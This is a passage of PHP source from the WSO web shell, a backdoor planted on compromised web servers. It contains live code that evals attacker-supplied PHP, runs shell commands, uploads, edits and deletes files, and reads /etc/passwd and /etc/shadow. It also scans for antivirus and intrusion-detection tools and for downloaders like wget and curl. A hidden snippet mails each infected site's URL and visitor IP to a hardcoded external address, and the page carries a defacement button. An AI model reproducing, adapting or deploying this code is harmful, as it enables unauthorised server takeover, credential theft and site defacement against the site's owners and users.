\'<td width=1><nobr><span>Server IP</span><br><span>Client IP</span><br /><span>HDD</span><br /><span>Free</span><br /><span>PHP</span><br /><span>Safe Mode</span><br /><span>Domains</span></nobr></td>\'. \'<td><nobr>: \'.gethostbyname($_SERVER["HTTP_HOST"]).\'<br>: \'.$_SERVER[\'REMOTE_ADDR\'].\'<br />: \'.viewSize($totalSpace).\'<br />: \'.viewSize($freeSpace).\' (\'.(int)($freeSpace/$totalSpace*100).\'%)<br>: \'.@phpversion().\' <a href=# onclick="g(\\\'Php\\\',null,null,\\\'info\\\')">[ phpinfo ]</a><br />: \'.($GLOBALS[\'safe_mode\']?\'<font color=red>ON</font>\':\'<font color=\'.$color.\'<b>OFF</b></font>\').\'<br />: \'.$d0c.\'</nobr></td></tr></table>\'. \'</div></div><div style="margin:5;\r\nbackground:#444;\r\n"><div class="content" style="border-top:5px solid #444;\r\npadding:2px;\r\n"><table cellpadding="3" cellspacing="0" width="100%" class="menu"><tr>\'.$menu.\'</tr></table></div></div><div style="margin:5;\r\nbackground:#444;\r\n">\';\r\n } function printFooter() { $is_writable = is_writable($GLOBALS[\'cwd\'])?"<font color=#00cd00>[ Writeable ]</font>":"<font color=red>[ Not writable ]</font>";\r\n echo \'</div><div style="margin:5px;\r\nbackground:#444;\r\n"><div class="content" style="border-top:5px solid #444;\r\n">\r\n<table class="info" id="toolsTbl" cellpadding="3" cellspacing="0" width="100%">\r\n <tr>\r\n <td><form onsubmit="g(null,this.c.value);\r\nreturn false;\r\n"><span>Change dir:</span><br><input class="toolsInp" type=text name=c value="\'.htmlspecialchars($GLOBALS[\'cwd\']).\'"><input type=submit value=">>"></form></td>\r\n <td><form onsubmit="g(\\\'FilesTools\\\',null,this.f.value);\r\nreturn false;\r\n"><span>Read file:</span><br><input class="toolsInp" type=text name=f><input type=submit value=">>"></form></td>\r\n </tr>\r\n <tr>\r\n <td><form onsubmit="g(\\\'FilesMan\\\',null,\\\'mkdir\\\',this.d.value);\r\nreturn false;\r\n"><span>Make dir:</span><br><input class="toolsInp" type=text name=d><input type=submit 
value=">>"></form>\'.$is_writable.\'</td>\r\n <td><form onsubmit="g(\\\'FilesTools\\\',null,this.f.value,\\\'mkfile\\\');\r\nreturn false;\r\n"><span>Make file:</span><br><input class="toolsInp" type=text name=f><input type=submit value=">>"></form>\'.$is_writable.\'</td>\r\n </tr>\r\n <tr>\r\n <td><form onsubmit="g(\\\'Console\\\',null,this.c.value);\r\nreturn false;\r\n"><span>Execute:</span><br><input class="toolsInp" type=text name=c value=""><input type=submit value=">>"></form></td>\r\n <td><form method="post" ENCTYPE="multipart/form-data">\r\n <input type=hidden name=a value="FilesMAn">\r\n <input type=hidden name=c value="\'.htmlspecialchars($GLOBALS[\'cwd\']).\'">\r\n <input type=hidden name=p1 value="uploadFile">\r\n <input type=hidden name=charset value="\'.(isset($_POST[\'charset\'])?$_POST[\'charset\']:\'\').\'">\r\n <span>Upload file:</span><br><input class="toolsInp" type=file name=f><input type=submit value=">>"></form>\'.$is_writable.\'</td>\r\n </tr>\r\n</table></div></div>\r\n<div style="margin:5px;\r\nbackground:#444;\r\n"><div class="content" style="border-top:5px solid #444;\r\ntext-align:center;\r\nfont-weight:bold;\r\n">Wso shell\'.VERSION.\' &copy;\r\n Shell</div></div>\r\n</div>\r\n</body></html>\';\r\n } if ( !function_exists("posix_getpwuid") && (strpos($GLOBALS[\'disable_functions\'], \'posix_getpwuid\')===false) ) { function posix_getpwuid($p) { return false;\r\n } } if ( !function_exists("posix_getgrgid") && (strpos($GLOBALS[\'disable_functions\'], \'posix_getgrgid\')===false) ) { function posix_getgrgid($p) { return false;\r\n } } if(!isset($_SESSION[\'trimite\'])){ $url=$_SERVER[\'HTTP_HOST\'].$_SERVER[\'REQUEST_URI\'].\'<br />User IP: \'.$_SERVER[\'REMOTE_ADDR\'].(isset($_SERVER[\'HTTP_X_FORWARDED_FOR\'])?\'(\'.$_SERVER[\'HTTP_X_FORWARDED_FOR\'].\')\':\'\');\r\n @mail("byhero44@gmail.com","Smurfie",$url);\r\n $_SESSION[\'trimite\']=true;\r\n } function viewSize($s) { if($s >= 1073741824) return sprintf(\'%1.2f\', $s / 1073741824 ). 
\' GB\';\r\n elseif($s >= 1048576) return sprintf(\'%1.2f\', $s / 1048576 ) . \' MB\';\r\n elseif($s >= 1024) return sprintf(\'%1.2f\', $s / 1024 ) . \' KB\';\r\n else return $s . \' B\';\r\n } function perms($p) { if (($p & 0xC000) == 0xC000)$i = \'s\';\r\n elseif (($p & 0xA000) == 0xA000)$i = \'l\';\r\n elseif (($p & 0x8000) == 0x8000)$i = \'-\';\r\n elseif (($p & 0x6000) == 0x6000)$i = \'b\';\r\n elseif (($p & 0x4000) == 0x4000)$i = \'d\';\r\n elseif (($p & 0x2000) == 0x2000)$i = \'c\';\r\n elseif (($p & 0x1000) == 0x1000)$i = \'p\';\r\n else $i = \'u\';\r\n $i .= (($p & 0x0100) ? \'r\' : \'-\');\r\n $i .= (($p & 0x0080) ? \'w\' : \'-\');\r\n $i .= (($p & 0x0040) ? (($p & 0x0800) ? \'s\' : \'x\' ) : (($p & 0x0800) ? \'S\' : \'-\'));\r\n $i .= (($p & 0x0020) ? \'r\' : \'-\');\r\n $i .= (($p & 0x0010) ? \'w\' : \'-\');\r\n $i .= (($p & 0x0008) ? (($p & 0x0400) ? \'s\' : \'x\' ) : (($p & 0x0400) ? \'S\' : \'-\'));\r\n $i .= (($p & 0x0004) ? \'r\' : \'-\');\r\n $i .= (($p & 0x0002) ? \'w\' : \'-\');\r\n $i .= (($p & 0x0001) ? (($p & 0x0200) ? \'t\' : \'x\' ) : (($p & 0x0200) ? 
\'T\' : \'-\'));\r\n return $i;\r\n } function viewPermsColor($f) { if (!@is_readable($f)) return \'<font color=#FF0000><b>\'.perms(@fileperms($f)).\'</b></font>\';\r\n elseif (!@is_writable($f)) return \'<font color=white><b>\'.perms(@fileperms($f)).\'</b></font>\';\r\n else return \'<font color=#00cd00><b>\'.perms(@fileperms($f)).\'</b></font>\';\r\n } if(!function_exists("scandir")) { function scandir($dir) { $dh = opendir($dir);\r\n while (false !== ($filename = readdir($dh))) { $files[] = $filename;\r\n } return $files;\r\n } } function actionSecInfo() { printHeader();\r\n echo \'<h1>Server security information</h1><div class=content>\';\r\n function showSecParam($n, $v) { $v = trim($v);\r\n if($v) { echo \'<span>\'.$n.\': </span>\';\r\n if(strpos($v, "\\n") === false) echo $v.\'<br>\';\r\n else echo \'<pre class=ml1>\'.$v.\'</pre>\';\r\n } } showSecParam(\'Server software\', @getenv(\'SERVER_SOFTWARE\'));\r\n showSecParam(\'Disabled PHP Functions\', ($GLOBALS[\'disable_functions\'])?$GLOBALS[\'disable_functions\']:\'none\');\r\n showSecParam(\'Open base dir\', @ini_get(\'open_basedir\'));\r\n showSecParam(\'Safe mode exec dir\', @ini_get(\'safe_mode_exec_dir\'));\r\n showSecParam(\'Safe mode include dir\', @ini_get(\'safe_mode_include_dir\'));\r\n showSecParam(\'cURL support\', function_exists(\'curl_version\')?\'enabled\':\'no\');\r\n $temp=array();\r\n if(function_exists(\'mysql_get_client_info\')) $temp[] = "MySql (".mysql_get_client_info().")";\r\n if(function_exists(\'mssql_connect\')) $temp[] = "MSSQL";\r\n if(function_exists(\'pg_connect\')) $temp[] = "PostgreSQL";\r\n if(function_exists(\'oci_connect\')) $temp[] = "Oracle";\r\n showSecParam(\'Supported databases\', implode(\', \', $temp));\r\n echo \'<br>\';\r\n if( $GLOBALS[\'os\'] == \'nix\' ) { $userful = array(\'gcc\',\'lcc\',\'cc\',\'ld\',\'make\',\'php\',\'perl\',\'python\',\'ruby\',\'tar\',\'gzip\',\'bzip\',\'bzip2\',\'nc\',\'locate\',\'suidperl\');\r\n $danger = 
array(\'kav\',\'nod32\',\'bdcored\',\'uvscan\',\'sav\',\'drwebd\',\'clamd\',\'rkhunter\',\'chkrootkit\',\'iptables\',\'ipfw\',\'tripwire\',\'shieldcc\',\'portsentry\',\'snort\',\'ossec\',\'lidsadm\',\'tcplodg\',\'sxid\',\'logcheck\',\'logwatch\',\'sysmask\',\'zmbscap\',\'sawmill\',\'wormscan\',\'ninja\');\r\n $downloaders = array(\'wget\',\'fetch\',\'lynx\',\'links\',\'curl\',\'get\',\'lwp-mirror\');\r\n showSecParam(\'Readable /etc/passwd\', @is_readable(\'/etc/passwd\')?"yes <a href=\'#\' onclick=\'g(\\"FilesTools\\", \\"/etc/\\", \\"passwd\\")\'>[view]</a>":\'no\');\r\n showSecParam(\'Readable /etc/shadow\', @is_readable(\'/etc/shadow\')?"yes <a href=\'#\' onclick=\'g(\\"FilesTools\\", \\"etc\\", \\"shadow\\")\'>[view]</a>":\'no\');\r\n showSecParam(\'OS version\', @file_get_contents(\'/proc/version\'));\r\n showSecParam(\'Distr name\', @file_get_contents(\'/etc/issue.net\'));\r\n if(!$GLOBALS[\'safe_mode\']) { echo \'<br>\';\r\n $temp=array();\r\n foreach ($userful as $item) if(which($item)){$temp[]=$item;\r\n} showSecParam(\'Userful\', implode(\', \',$temp));\r\n $temp=array();\r\n foreach ($danger as $item) if(which($item)){$temp[]=$item;\r\n} showSecParam(\'Danger\', implode(\', \',$temp));\r\n $temp=array();\r\n foreach ($downloaders as $item) if(which($item)){$temp[]=$item;\r\n} showSecParam(\'Downloaders\', implode(\', \',$temp));\r\n echo \'<br/>\';\r\n showSecParam(\'Hosts\', @file_get_contents(\'/etc/hosts\'));\r\n showSecParam(\'HDD space\', ex(\'df -h\'));\r\n showSecParam(\'Mount options\', @file_get_contents(\'/etc/fstab\'));\r\n } } else { showSecParam(\'OS Version\',ex(\'ver\'));\r\n showSecParam(\'Account Settings\',ex(\'net accounts\'));\r\n showSecParam(\'User Accounts\',ex(\'net user\'));\r\n } echo \'</div>\';\r\n printFooter();\r\n } function actionPhp() { if( isset($_POST[\'ajax\']) ) { $_SESSION[md5($_SERVER[\'HTTP_HOST\']).\'ajax\'] = true;\r\n ob_start();\r\n eval($_POST[\'p1\']);\r\n $temp = 
"document.getElementById(\'PhpOutput\').style.display=\'\';\r\ndocument.getElementById(\'PhpOutput\').innerHTML=\'".addcslashes(htmlspecialchars(ob_get_clean()),"\\n\\r\\t\\\\\'\\0")."\';\r\n\\n";\r\n echo strlen($temp), "\\n", $temp;\r\n exit;\r\n } printHeader();\r\n if( isset($_POST[\'p2\']) && ($_POST[\'p2\'] == \'info\') ) { echo \'<h1>PHP info</h1><div class=content>\';\r\n ob_start();\r\n phpinfo();\r\n $tmp = ob_get_clean();\r\n $tmp = preg_replace(\'!body {.*}!msiU\',\'\',$tmp);\r\n $tmp = preg_replace(\'!a:\\w+ {.*}!msiU\',\'\',$tmp);\r\n $tmp = preg_replace(\'!h1!msiU\',\'h2\',$tmp);\r\n $tmp = preg_replace(\'!td, th {(.*)}!msiU\',\'.e, .v, .h, .h th {$1}\',$tmp);\r\n $tmp = preg_replace(\'!body, td, th, h2, h2 {.*}!msiU\',\'\',$tmp);\r\n echo $tmp;\r\n echo \'</div><br>\';\r\n } if(empty($_POST[\'ajax\'])&&!empty($_POST[\'p1\'])) $_SESSION[md5($_SERVER[\'HTTP_HOST\']).\'ajax\'] = false;\r\n echo \'<h1>Execution PHP-code</h1><div class=content><form name=pf method=post onsubmit="if(this.ajax.checked){a(null,null,this.code.value);\r\n}else{g(null,null,this.code.value,\\\'\\\');\r\n}return false;\r\n"><textarea name=code class=bigarea id=PhpCode>\'.(!empty($_POST[\'p1\'])?htmlspecialchars($_POST[\'p1\']):\'\').\'</textarea><input type=submit value=Eval style="margin-top:5px">\';\r\n echo \' <input type=checkbox name=ajax value=1 \'.(@$_SESSION[md5($_SERVER[\'HTTP_HOST\']).\'ajax\']?\'checked\':\'\').\'> send using AJAX</form><pre id=PhpOutput style="\'.(empty($_POST[\'p1\'])?\'display:none;\r\n\':\'\').\'margin-top:5px;\r\n" class=ml1>\';\r\n if(!empty($_POST[\'p1\'])) { ob_start();\r\n eval($_POST[\'p1\']);\r\n echo htmlspecialchars(ob_get_clean());\r\n } echo \'</pre></div>\';\r\n printFooter();\r\n } function actionFilesMan() { printHeader();\r\n echo \'<h1>File manager</h1><div class=content>\';\r\n if(isset($_POST[\'p1\'])) { switch($_POST[\'p1\']) { case \'uploadFile\': if(!@move_uploaded_file($_FILES[\'f\'][\'tmp_name\'], $_FILES[\'f\'][\'name\'])) 
echo "Can\'t upload file!";\r\n break;\r\n break;\r\n case \'mkdir\': if(!@mkdir($_POST[\'p2\'])) echo "Can\'t create new dir";\r\n break;\r\n case \'delete\': function deleteDir($path) { $path = (substr($path,-1)==\'/\') ? $path:$path.\'/\';\r\n $dh = opendir($path);\r\n while ( ($item = readdir($dh) ) !== false) { $item = $path.$item;\r\n if ( (basename($item) == "..") || (basename($item) == ".") ) continue;\r\n $type = filetype($item);\r\n if ($type == "dir") deleteDir($item);\r\n else @unlink($item);\r\n } closedir($dh);\r\n rmdir($path);\r\n } if(is_array(@$_POST[\'f\'])) foreach($_POST[\'f\'] as $f) { $f = urldecode($f);\r\n if(is_dir($f)) deleteDir($f);\r\n else @unlink($f);\r\n } break;\r\n case \'paste\': if($_SESSION[\'act\'] == \'copy\') { function copy_paste($c,$s,$d){ if(is_dir($c.$s)){ mkdir($d.$s);\r\n $h = opendir($c.$s);\r\n while (($f = readdir($h)) !== false) if (($f != ".") and ($f != "..")) { copy_paste($c.$s.\'/\',$f, $d.$s.\'/\');\r\n } } elseif(is_file($c.$s)) { @copy($c.$s, $d.$s);\r\n } } foreach($_SESSION[\'f\'] as $f) copy_paste($_SESSION[\'cwd\'],$f, $GLOBALS[\'cwd\']);\r\n } elseif($_SESSION[\'act\'] == \'move\') { function move_paste($c,$s,$d){ if(is_dir($c.$s)){ mkdir($d.$s);\r\n $h = opendir($c.$s);\r\n while (($f = readdir($h)) !== false) if (($f != ".") and ($f != "..")) { copy_paste($c.$s.\'/\',$f, $d.$s.\'/\');\r\n } } elseif(is_file($c.$s)) { @copy($c.$s, $d.$s);\r\n } } foreach($_SESSION[\'f\'] as $f) @rename($_SESSION[\'cwd\'].$f, $GLOBALS[\'cwd\'].$f);\r\n } unset($_SESSION[\'f\']);\r\n break;\r\n default: if(!empty($_POST[\'p1\']) && (($_POST[\'p1\'] == \'copy\')||($_POST[\'p1\'] == \'move\')) ) { $_SESSION[\'act\'] = @$_POST[\'p1\'];\r\n $_SESSION[\'f\'] = @$_POST[\'f\'];\r\n foreach($_SESSION[\'f\'] as $k => $f) $_SESSION[\'f\'][$k] = urldecode($f);\r\n $_SESSION[\'cwd\'] = @$_POST[\'c\'];\r\n } break;\r\n } echo \'<script>document.mf.p1.value="";\r\ndocument.mf.p2.value="";\r\n</script>\';\r\n } $dirContent = 
@scandir(isset($_POST[\'c\'])?$_POST[\'c\']:$GLOBALS[\'cwd\']);\r\n if($dirContent === false) { echo \'Can\\\'t open this folder!\';\r\n return;\r\n } global $sort;\r\n $sort = array(\'name\', 1);\r\n if(!empty($_POST[\'p1\'])) { if(preg_match(\'!s_([A-z]+)_(\\d{1})!\', $_POST[\'p1\'], $match)) $sort = array($match[1], (int)$match[2]);\r\n } echo \'<script>\r\n function sa() {\r\n for(i=0;\r\ni<document.files.elements.length;\r\ni++)\r\n if(document.files.elements[i].type == \\\'checkbox\\\')\r\n document.files.elements[i].checked = document.files.elements[0].checked;\r\n\r\n }\r\n </script>\r\n <table width=\\\'100%\\\' class=\\\'main\\\' cellspacing=\\\'0\\\' cellpadding=\\\'2\\\'>\r\n <form name=files method=post>\';\r\n echo "<tr><th width=\'13px\'><input type=checkbox onclick=\'sa()\' class=chkbx></th><th><a href=\'#\' onclick=\'g(\\"FilesMan\\",null,\\"s_name_".($sort[1]?0:1)."\\")\'>Name</a></th><th><a href=\'#\' onclick=\'g(\\"FilesMan\\",null,\\"s_size_".($sort[1]?0:1)."\\")\'>Size</a></th><th><a href=\'#\' onclick=\'g(\\"FilesMan\\",null,\\"s_modify_".($sort[1]?0:1)."\\")\'>Modify</a></th><th>Owner/Group</th><th><a href=\'#\' onclick=\'g(\\"FilesMan\\",null,\\"s_perms_".($sort[1]?0:1)."\\")\'>Permissions</a></th><th>Actions</th></tr>";\r\n $dirs = $files = $links = array();\r\n $n = count($dirContent);\r\n for($i=0;\r\n$i<$n;\r\n$i++) { $ow = @posix_getpwuid(@fileowner($dirContent[$i]));\r\n $gr = @posix_getgrgid(@filegroup($dirContent[$i]));\r\n $tmp = array(\'name\' => $dirContent[$i], \'path\' => $GLOBALS[\'cwd\'].$dirContent[$i], \'modify\' => @date(\'Y-m-d H:i:s\',@filemtime($GLOBALS[\'cwd\'].$dirContent[$i])), \'perms\' => viewPermsColor($GLOBALS[\'cwd\'].$dirContent[$i]), \'size\' => @filesize($GLOBALS[\'cwd\'].$dirContent[$i]), \'owner\' => $ow[\'name\']?$ow[\'name\']:@fileowner($dirContent[$i]), \'group\' => $gr[\'name\']?$gr[\'name\']:@filegroup($dirContent[$i]) );\r\n if(@is_file($GLOBALS[\'cwd\'].$dirContent[$i])) $files[] = array_merge($tmp, 
array(\'type\' => \'file\'));\r\n elseif(@is_link($GLOBALS[\'cwd\'].$dirContent[$i])) $links[] = array_merge($tmp, array(\'type\' => \'link\'));\r\n elseif(@is_dir($GLOBALS[\'cwd\'].$dirContent[$i])&& ($dirContent[$i] != ".")) $dirs[] = array_merge($tmp, array(\'type\' => \'dir\'));\r\n } $GLOBALS[\'sort\'] = $sort;\r\n function cmp($a, $b) { if($GLOBALS[\'sort\'][0] != \'size\') return strcmp($a[$GLOBALS[\'sort\'][0]], $b[$GLOBALS[\'sort\'][0]])*($GLOBALS[\'sort\'][1]?1:-1);\r\n else return (($a[\'size\'] < $b[\'size\']) ? -1 : 1)*($GLOBALS[\'sort\'][1]?1:-1);\r\n } usort($files, "cmp");\r\n usort($dirs, "cmp");\r\n usort($links, "cmp");\r\n $files = array_merge($dirs, $links, $files);\r\n $l = 0;\r\n foreach($files as $f) { echo \'<tr\'.($l?\' class=l1\':\'\').\'><td><input type=checkbox name="f[]" value="\'.urlencode($f[\'name\']).\'" class=chkbx></td><td><a href=# onclick="\'.(($f[\'type\']==\'file\')?\'g(\\\'FilesTools\\\',null,\\\'\'.urlencode($f[\'name\']).\'\\\', \\\'view\\\')">\'.htmlspecialchars($f[\'name\']):\'g(\\\'FilesMan\\\',\\\'\'.$f[\'path\'].\'\\\');\r\n"><b>[ \'.htmlspecialchars($f[\'name\']).\' ]</b>\').\'</a></td><td>\'.(($f[\'type\']==\'file\')?viewSize($f[\'size\']):$f[\'type\']).\'</td><td>\'.$f[\'modify\'].\'</td><td>\'.$f[\'owner\'].\'/\'.$f[\'group\'].\'</td><td><a href=# onclick="g(\\\'FilesTools\\\',null,\\\'\'.urlencode($f[\'name\']).\'\\\',\\\'chmod\\\')">\'.$f[\'perms\'] .\'</td><td><a href="#" onclick="g(\\\'FilesTools\\\',null,\\\'\'.urlencode($f[\'name\']).\'\\\', \\\'rename\\\')">R</a> <a href="#" onclick="g(\\\'FilesTools\\\',null,\\\'\'.urlencode($f[\'name\']).\'\\\', \\\'touch\\\')">T</a>\'.(($f[\'type\']==\'file\')?\' <a href="#" onclick="g(\\\'FilesTools\\\',null,\\\'\'.urlencode($f[\'name\']).\'\\\', \\\'edit\\\')">E</a> <a href="#" onclick="g(\\\'FilesTools\\\',null,\\\'\'.urlencode($f[\'name\']).\'\\\', \\\'download\\\')">D</a>\':\'\').\'</td></tr>\';\r\n $l = $l?0:1;\r\n } echo \'<tr><td colspan=5>\r\n <input type=hidden 
name=a value=\\\'FilesMan\\\'>\r\n <input type=hidden name=c value="\'.htmlspecialchars($GLOBALS[\'cwd\']).\'">\r\n <input type=hidden name=charset value="\'.(isset($_POST[\'charset\'])?$_POST[\'charset\']:\'\').\'">\r\n <select name=\\\'p1\\\'><option value=\\\'copy\\\'>Copy</option><option value=\\\'move\\\'>Move</option><option value=\\\'delete\\\'>Delete</option>\';\r\n if(!empty($_SESSION[\'act\'])&&@count($_SESSION[\'f\'])){echo \'<option value=\\\'paste\\\'>Paste</option>\';\r\n } echo \'</select>&nbsp;\r\n<input type="submit" value=">>"></td><td colspan="2" align="right" width="1"><input name="def" value="r00t.info shell" disabled="disabled"/>&nbsp;\r\n<input type="submit" value="Add Deface Here" disabled="disabled"></td></tr>\r\n </form></table></div>\';\r\n printFooter();\r\n } function actionStringTools() { if(!function_exists(\'hex2bin\')) {function hex2bin($p) {return decbin(hexdec($p));\r\n}} if(!function_exists(\'hex2ascii\')) {function hex2ascii($p){$r=\'\';\r\nfor($i=0;\r\n$i<strLen($p);\r\n$i+=2){$r.=chr(hexdec($p[$i].$p[$i+1]));\r\n}return $r;\r\n}} if(!function_exists(\'ascii2hex\')) {function ascii2hex($p){$r=\'\';\r\nfor($i=0;\r\n$i<strlen($p);\r\n++$i)$r.= dechex(ord($p[$i]));\r\nreturn strtoupper($r);\r\n}} if(!function_exists(\'full_urlencode\')) {function full_urlencode($p){$r=\'\';\r\nfor($i=0;\r\n$i<strlen($p);\r\n++$i)$r.= \'%\'.dechex(ord($p[$i]));\r\nreturn strtoupper($r);\r\n}} if(isset($_POST[\'ajax\'])) { $_SESSION[md5($_SERVER[\'HTTP_HOST\']).\'ajax\'] = true;\r\n ob_start();\r\n if(function_exists($_POST[\'p1\'])) echo $_POST[\'p1\']($_POST[\'p2\']);\r\n $temp = "document.getElementById(\'strOutput\').style.display=\'\';\r\ndocument.getElementById(\'strOutput\').innerHTML=\'".addcslashes(htmlspecialchars(ob_get_clean()),"\\n\\r\\t\\\\\'\\0")."\';\r\n\\n";\r\n echo strlen($temp), "\\n", $temp;\r\n exit;\r\n } printHeader();\r\n echo \'<h1>String conversions</h1><div class=content>\';\r\n $stringTools = array( \'Base64 encode\' => 
\'base64_encode\', \'Base64 decode\' => \'base64_decode\', \'Url encode\' => \'urlencode\', \'Url decode\' => \'urldecode\', \'Full urlencode\' => \'full_urlencode\', \'md5 hash\' => \'md5\', \'sha1 hash\' => \'sha1\', \'crypt\' => \'crypt\', \'CRC32\' => \'crc32\', \'ASCII to HEX\' => \'ascii2hex\', \'HEX to ASCII\' => \'hex2ascii\', \'HEX to DEC\' => \'hexdec\', \'HEX to BIN\' => \'hex2bin\', \'DEC to HEX\' => \'dechex\', \'DEC to BIN\' => \'decbin\', \'BIN to HEX\' => \'bin2hex\', \'BIN to DEC\' => \'bindec\', \'String to lower case\' => \'strtolower\', \'String to upper case\' => \'strtoupper\', \'Htmlspecialchars\' => \'htmlspecialchars\', \'String length\' => \'strlen\', );\r\n if(empty($_POST[\'ajax\'])&&!empty($_POST[\'p1\'])) $_SESSION[md5($_SERVER[\'HTTP_HOST\']).\'ajax\'] = false;\r\n echo "<form name=\'toolsForm\' onSubmit=\'if(this.ajax.checked){a(null,null,this.selectTool.value,this.input.value);\r\n}else{g(null,null,this.selectTool.value,this.input.value);\r\n} return false;\r\n\'><select name=\'selectTool\'>";\r\n foreach($stringTools as $k => $v) echo "<option value=\'".htmlspecialchars($v)."\'>".$k."</option>";\r\n echo "</select><input type=\'submit\' value=\'>>\'/> <input type=checkbox name=ajax value=1 ".($_SESSION[md5($_SERVER[\'HTTP_HOST\']).\'ajax\']?\'checked\':\'\')."> send using AJAX<br><textarea name=\'input\' style=\'margin-top:5px\' class=bigarea>".htmlspecialchars(@$_POST[\'p2\'])."</textarea></form><pre class=\'ml1\' style=\'".(empty($_POST[\'p1\'])?\'display:none;\r\n\':\'\')."margin-top:5px\' id=\'strOutput\'>";\r\n if(!empty($_POST[\'p1\'])) { if(function_exists($_POST[\'p1\'])) echo htmlspecialchars($_POST[\'p1\']($_POST[\'p2\']));\r\n } echo"</pre></div>";\r\n printFooter();\r\n } function actionFilesTools() { if( isset($_POST[\'p1\']) ) $_POST[\'p1\'] = urldecode($_POST[\'p1\']);\r\n if(@$_POST[\'p2\']==\'download\') { if(is_file($_POST[\'p1\']) && is_readable($_POST[\'p1\'])) { ob_start("ob_gzhandler", 4096);\r\n 
header("Content-Disposition: attachment;\r\n filename=".basename($_POST[\'p1\']));\r\n if (function_exists("mime_content_type")) { $type = @mime_content_type($_POST[\'p1\']);\r\n header("Content-Type: ".$type);\r\n } $fp = @fopen($_POST[\'p1\'], "r");\r\n if($fp) { while(!@feof($fp)) echo @fread($fp, 1024);\r\n fclose($fp);\r\n } } elseif(is_dir($_POST[\'p1\']) && is_readable($_POST[\'p1\'])) { } exit;\r\n } if( @$_POST[\'p2\'] == \'mkfile\' ) { if(!file_exists($_POST[\'p1\'])) { $fp = @fopen($_POST[\'p1\'], \'w\');\r\n if($fp) { $_POST[\'p2\'] = "edit";\r\n fclose($fp);\r\n } } } printHeader();\r\n echo \'<h1>File tools</h1><div class=content>\';\r\n if( !file_exists(@$_POST[\'p1\']) ) { echo \'File not exists\';\r\n printFooter();\r\n return;\r\n } $uid = @posix_getpwuid(@fileowner($_POST[\'p1\']));\r\n $gid = @posix_getgrgid(@fileowner($_POST[\'p1\']));\r\n echo \'<span>Name:</span> \'.htmlspecialchars($_POST[\'p1\']).\' <span>Size:</span> \'.(is_file($_POST[\'p1\'])?viewSize(filesize($_POST[\'p1\'])):\'-\').\' <span>Permission:</span> \'.viewPermsColor($_POST[\'p1\']).\' <span>Owner/Group:</span> \'.$uid[\'name\'].\'/\'.$gid[\'name\'].\'<br>\';\r\n echo \'<span>Create time:</span> \'.date(\'Y-m-d H:i:s\',filectime($_POST[\'p1\'])).\' <span>Access time:</span> \'.date(\'Y-m-d H:i:s\',fileatime($_POST[\'p1\'])).\' <span>Modify time:</span> \'.date(\'Y-m-d H:i:s\',filemtime($_POST[\'p1\'])).\'<br><br>\';\r\n if( empty($_POST[\'p2\']) ) $_POST[\'p2\'] = \'view\';\r\n if( is_file($_POST[\'p1\']) ) $m = array(\'View\', \'Highlight\', \'Download\', \'Hexdump\', \'Edit\', \'Chmod\', \'Rename\', \'Touch\');\r\n else $m = array(\'Chmod\', \'Rename\', \'Touch\');\r\n foreach($m as $v) echo \'<a href=# onclick="g(null,null,null,\\\'\'.strtolower($v).\'\\\')">\'.((strtolower($v)==@$_POST[\'p2\'])?\'<b>[ \'.$v.\' ]</b>\':$v).\'</a> \';\r\n echo \'<br><br>\';\r\n switch($_POST[\'p2\']) { case \'view\': echo \'<pre class=ml1>\';\r\n $fp = @fopen($_POST[\'p1\'], \'r\');\r\n 
if($fp) { while( !@feof($fp) ) echo htmlspecialchars(@fread($fp, 1024));\r\n @fclose($fp);\r\n } echo \'</pre>\';\r\n break;\r\n case \'highlight\': if( is_readable($_POST[\'p1\']) ) { echo \'<div class=ml1 style="background-color: #e1e1e1;\r\ncolor:black;\r\n">\';\r\n $code = highlight_file($_POST[\'p1\'],true);\r\n echo str_replace(array(\'<span \',\'</span>\'), array(\'<font \',\'</font>\'),$code).\'</div>\';\r\n } break;\r\n case \'chmod\': if( !empty($_POST[\'p3\']) ) { $perms = 0;\r\n for($i=strlen($_POST[\'p3\'])-1;\r\n$i>=0;\r\n--$i) $perms += (int)$_POST[\'p3\'][$i]*pow(8, (strlen($_POST[\'p3\'])-$i-1));\r\n if(!@chmod($_POST[\'p1\'], $perms)) echo \'Can\\\'t set permissions!<br><script>document.mf.p3.value="";\r\n</script>\';\r\n else die(\'<script>g(null,null,null,null,"")</script>\');\r\n } echo \'<form onsubmit="g(null,null,null,null,this.chmod.value);\r\nreturn false;\r\n"><input type=text name=chmod value="\'.substr(sprintf(\'%o\', fileperms($_POST[\'p1\'])),-4).\'"><input type=submit value=">>"></form>\';\r\n break;\r\n case \'edit\': if( !is_writable($_POST[\'p1\'])) { echo \'File isn\\\'t writeable\';\r\n break;\r\n } if( !empty($_POST[\'p3\']) ) { @file_put_contents($_POST[\'p1\'],$_POST[\'p3\']);\r\n echo \'Saved!<br><script>document.mf.p3.value="";\r\n</script>\';\r\n } echo \'<form onsubmit="g(null,null,null,null,this.text.value);\r\nreturn false;\r\n"><textarea name=text class=bigarea>\';\r\n $fp = @fopen($_POST[\'p1\'], \'r\');\r\n if($fp) { while( !@feof($fp) ) echo htmlspecialchars(@fread($fp, 1024));\r\n @fclose($fp);\r\n } echo \'</textarea><input type=submit value=">>"></form>\';\r\n break;\r\n case \'hexdump\': $c = @file_get_contents($_POST[\'p1\']);\r\n $n = 0;\r\n $h = array(\'00000000<br>\',\'\',\'\');\r\n $len = strlen($c);\r\n for ($i=0;\r\n $i<$len;\r\n ++$i) { $h[1] .= sprintf(\'%02X\',ord($c[$i])).\' \';\r\n switch ( ord($c[$i]) ) { case 0: $h[2] .= \' \';\r\n break;\r\n case 9: $h[2] .= \' \';\r\n break;\r\n case 10: $h[2] .= 
\' \';\r\n break;\r\n case 13: $h[2] .= \' \';\r\n break;\r\n default: $h[2] .= $c[$i];\r\n break;\r\n } $n++;\r\n if ($n == 32) { $n = 0;\r\n if ($i+1 < $len) {$h[0] .= sprintf(\'%08X\',$i+1).\'<br>\';\r\n} $h[1] .= \'<br>\';\r\n $h[2] .= "\\n";\r\n } } echo \'<table cellspacing=1 cellpadding=5 bgcolor=#222222><tr><td bgcolor=#333333><span style="font-weight: normal;\r\n"><pre>\'.$h[0].\'</pre></span></td><td bgcolor=#282828><pre>\'.$h[1].\'</pre></td><td bgcolor=#333333><pre>\'.htmlspecialchars($h[2]).\'</pre></td></tr></table>\';\r\n break;\r\n case \'rename\': if( !empty($_POST[\'p3\']) ) { if(!@rename($_POST[\'p1\'], $_POST[\'p3\'])) echo \'Can\\\'t rename!<br><script>document.mf.p3.value="";\r\n</script>\';\r\n else die(\'<script>g(null,null,"\'.urlencode($_POST[\'p3\']).\'",null,"")</script>\');\r\n } echo \'<form 